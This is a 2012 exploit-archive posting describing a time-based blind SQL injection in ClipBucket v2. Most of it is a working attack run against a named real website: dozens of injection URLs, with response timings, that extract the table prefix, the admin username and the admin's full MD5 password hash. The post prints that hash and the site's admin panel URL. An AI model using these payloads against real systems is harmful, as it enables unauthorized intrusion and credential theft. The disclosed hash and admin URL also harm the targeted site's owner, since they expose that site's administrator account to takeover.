ClipBucket 2 Blind SQL Injection

ClipBucket 2 Blind SQL Injection: Posted Jul 18, 2012; Authored by Akastep; ClipBucket version 2 suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.; tags | exploit, remote, sql injection; SHA-256 | 908a1ea098afb0afffccbe3d11106c241ae2a4f161d8387e327501693cbf137d; Download | Favorite | View
ClipBucket 2 Blind SQL Injection

===============================================================================
Vulnerable Software:  ClipBucket v2
Official Site: http://clip-bucket.com/

================================================================================
Exploited: In Wild. 
================================================================================

Vuln Desc:
ClipBucket v2 is prone to Blind Sql injection vuln.

It seems it is pretty oldish version and  i'm a bit lazy to "fingerprint" which build is vulnerable.

Anyways, at least from source code of page it will "say" : <!-- ClipBucket v2 -->

If you want to fingerprint is target site vulnerable:Use simply this way: (If you got "delay" this means it is vulnerable version)

site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--


Theris also another way to fingerprint it:
On vulnerable versions you will find such menu's: (Especially Help Menu section on index page)


© ClipBucket v2 2012
Home Contact Us About us Privacy Policy Terms of Serivce Help


Real exploitation example:


radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--





table name 13 simvoldur burda
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--




table prefixi oyrenmek lazimdir:



http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--






BU DUZ VERIR.
//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--


//TRUE tablin 1ci simvolu:
 c
=========================
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--


2-ci simvolu:   b


3-cu simvolu: _

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--



table prefix:   cb_




User id ni yoxluyuruq:

//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--


ID=1

UNAME: admin

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--



Passi cekmek yolu:


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--



PASS:
=======================================================
1-ci simvol: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--

YAXUD:


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--


RTIME: 56250 ms

=======================================================
2-ci simvol:   5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 55578 ms
=======================================================
3-cu simvol:   c

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--

RTIME: 55579 ms

=======================================================
4-cu simvol:    3

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--

RTIME 55656
=======================================================
5-ci simvol:     a

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--

RTIME:  56234

=======================================================
6-ci simvol:     6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 69672 ms
=======================================================
7-ci simvol:     a  (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--

RTIME : 17266 ms
=======================================================
8-ci simvol:    6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56141 ms

=======================================================
9-cu simvol:     6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56125 ms
=======================================================
10-cu simvol:     2

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--

RTIME: 56157 ms
=======================================================
11-ci simvol:   3

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--


RTIME: 55937 ms

=======================================================
12-ci simvol:  b

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--

RTIME: 56234
=======================================================
13-cu simvol:   6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56219 ms

========================================================
14-cu simvol:   9

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--

RTIME:  56297  ms

========================================================

15-ci simvol:  5 

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--

RTIME:   55641 ms

=========================================================
16- ci simvol:   f

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--

RTIME:   56828 ms
=========================================================

17-ci simvol:   7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME:  56296 ms

=========================================================

18-ci simvol: 5  (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--


RTIME:   55469 ms

==========================================================

19-cu simvol:    6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME:  56390 ms
=========================================================
20-ci simvol:   b

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--


RTIME: 56375

========================================================

21-ci simvol:  d  (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME 55796 ms


=======================================================

22-ci simvol:  d (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME 56406



=======================================================
23-cu simvol:     f

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--

RTIME:  55563 ms


========================================================
24-cu simvol:   0  (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--

RTIME:   56172 ms

========================================================
25-ci simvol:    4 

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--

RTIME:  56078 ms

========================================================
26-ci simvol:   9


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--


RTIME:  55594 ms

========================================================
27-ci simvol:   6


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--


RTIME:  56094 ms


========================================================
28-ci simvol:   7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME:  56109 ms

========================================================
29-cu simvol:  c

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--


RTIME: 55563 ms


========================================================
30-cu simvol:   d

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME:   55625 ms

========================================================

31-ci simvol:   5

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--

RTIME: 56188 ms


=========================================================

32-ci simvol:     7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME:   55625 ms



=========================================================
So we got: 

uname: admin
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57
Admin Panel: http://radio5.5.am/admin_area/


//TRUE

Verifying is obtainted hash valid?
In this case it gives again "delay" which is hint for us: Obtained hash is valid.

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--


[ ]Done[ ]





+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ + 
           *Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++

Respect && Thank you.

/AkaStep ^_^
Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 69 files
Debian 20 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
LiquidWorm 4 files
Spencer McIntyre 3 files
Alter Prime 3 files
Jann Horn 3 files
File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other
ClipBucket 2 Blind SQL Injection

ClipBucket 2 Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ClipBucket 2 Blind SQL Injection

Share This

ClipBucket 2 Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems
